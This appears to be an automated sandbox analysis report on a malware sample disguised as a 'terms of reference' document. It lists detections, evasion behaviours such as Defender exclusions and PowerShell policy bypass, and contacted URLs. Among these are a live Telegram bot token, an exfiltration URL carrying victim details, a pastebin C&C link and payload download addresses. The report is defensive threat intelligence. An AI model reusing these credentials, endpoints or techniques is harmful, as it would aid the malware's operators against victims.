behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617329 Sample: Terms_of_reference_06_01_20... Startdate: 17/02/2025 Architecture: WINDOWS Score: 100 37 pastebin.com 2->37 39 api.telegram.org 2->39 41 2 other IPs or domains 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Multi AV Scanner detection for submitted file 2->55 61 4 other signatures 2->61 9 Terms_of_reference_06_01_2025_samsung.scr.exe 11 2->9         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 59 Uses the Telegram API (likely for C&C communication) 39->59 process4 dnsIp5 43 ip-api.com 208.95.112.1, 49720, 80 TUT-ASUS United States 9->43 45 api.telegram.org 149.154.167.220, 443, 49726, 59790 TELEGRAMRU United Kingdom 9->45 47 2 other IPs or domains 9->47 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->63 65 Bypasses PowerShell execution policy 9->65 67 Adds a directory exclusion to Windows Defender 9->67 13 powershell.exe 14 24 9->13         started        18 powershell.exe 23 9->18         started        20 powershell.exe 9->20         started        signatures6 process7 dnsIp8 49 pastebin.com 172.67.19.24, 443, 49704 CLOUDFLARENETUS United States 13->49 35 C:\Users\user\AppData\...\xy2h0pkm.cmdline, Unicode 13->35 dropped 69 Writes to foreign memory regions 13->69 22 csc.exe 3 13->22         started        25 conhost.exe 13->25         started        71 Loading BitLocker PowerShell Module 18->71 27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        file9 signatures10 process11 file12 33 C:\Users\user\AppData\Local\...\xy2h0pkm.dll, PE32 22->33 dropped 31 cvtres.exe 1 22->31         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Terms_of_reference_06_01_2025_samsung.scr.exe59%ReversingLabsWin64.Downloader.LummaStealer
Terms_of_reference_06_01_2025_samsung.scr.exe56%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://schemas.datacontract.org/2004/07/SystemV0%Avira URL Cloudsafe
http://89.23.97.214/TeamBuild/win64_svchost.exeh0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Xml0%Avira URL Cloudsafe
http://89.23.97.214:80/0%Avira URL Cloudsafe
http://89.23.97.214/TeamBuild/win32_svchost.exe100%Avira URL Cloudmalware
http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w0%Avira URL Cloudsafe
http://api.ipify.orgnotification_sent.flag0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Xml.Linq0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.Runtime.Serialization0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/SystemY0%Avira URL Cloudsafe
http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_0%Avira URL Cloudsafe
http://schemas.datacontract.org/2004/07/System.IO0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      api.telegram.org
      		149.154.167.220
      		truefalse
        		high
        pastebin.com
        		172.67.19.24
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0Afalse
            		high
            https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessagefalse
              		high
              https://pastebin.com/raw/WHKzW2nrfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.datacontract.org/2004/07/SystemVTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://html4/loose.dtdTerms_of_reference_06_01_2025_samsung.scr.exefalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://api.telegram.orgTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.datacontract.orgTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://api.telegram.org/botTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/dotnet/infoTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://89.23.97.214/TeamBuild/win64_svchost.exehTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/dotnet/app-launch-failedTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://schemas.datacontract.org/2004/07/System.XmlTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://.cssTerms_of_reference_06_01_2025_samsung.scr.exefalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/dotnet-core-applaunch?Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/dotnet/runtimeTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmpfalse
                                              		high
                                              http://api.telegram.org:443/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://ip-api.com:80/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/dotnet-warnings/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.microsopowershell.exe, 00000002.00000002.2168143247.0000029BCDA86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ip-api.com/json/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/nativeaot-compatibilityTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/dotnet/runtime/issues/71847Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ip-api.com/json/8.46.123.189Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://aka.ms/serializationformat-binary-obsoleteTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://api.ipify.org/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/binaryformatterTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.micft.cMicRosofpowershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/mono/linker/pull/649Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://.jpgTerms_of_reference_06_01_2025_samsung.scr.exefalse
                                                                                    		high
                                                                                    https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessagehTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://89.23.97.214:80/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776479000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.datacontract.org/2004/07/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://aka.ms/dotnet/download%s%sInstallTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://go.micropowershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://exslt.org/commonTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.micpowershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.datacontract.org/2004/07/System.Runtime.SerializationTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://aka.ms/dotnet-illink/comTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/localityTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.datacontract.org/2004/07/NETdesign.Plugin.NotiferTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://api.ipify.org:80/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ip-api.com/json/8Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://aka.ms/dotnet-illink/nativehosttTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://89.23.97.214/TeamBuild/win32_svchost.exeTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://api.ipify.orgTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/mono/linker/issues/378Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://api.ipify.orgnotification_sent.flagTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://aka.ms/dotnet/sdk-not-foundProbingTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.oTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/wsdl/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
